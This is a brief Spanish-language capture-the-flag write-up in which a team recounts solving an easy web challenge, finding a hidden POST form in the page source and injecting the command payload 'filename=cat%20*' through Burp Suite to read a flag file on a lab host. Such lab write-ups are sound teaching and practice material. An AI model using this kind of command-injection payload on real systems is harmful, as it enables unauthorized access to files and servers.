Este desafió estaba clasificado como “papita” pero tiene un significado muy importante para mi y nuestro equipo alertot, ya que nos permitió quedar en segundo lugar en los últimos segundo de la competencia.
*** DESCRIPCIÓN ***
Cacha, encontré esta página con puras fotos de flaites, inyectao detonao xD
Reported Difficulty: papita
Al leer el código de fuente nos daba información de un request POST así que nos fuimos a nuestro mejor amigo para estas situaciones Burp Suite :D
<! — <div class=”container”>
<form action=”” method=”POST”>
<input type=”hidden” name=”filename” value=”images.zip” />
<input type=”submit” class=”btn-info” value=”Download all” />
</form>
</div> →
Realizamos distintos intentos de inyección en esta maquina hasta que dimos con el indicado.
PAYLOAD: filename=cat%20*
http://10.4.4.25:8888/estaeslaflag.txt
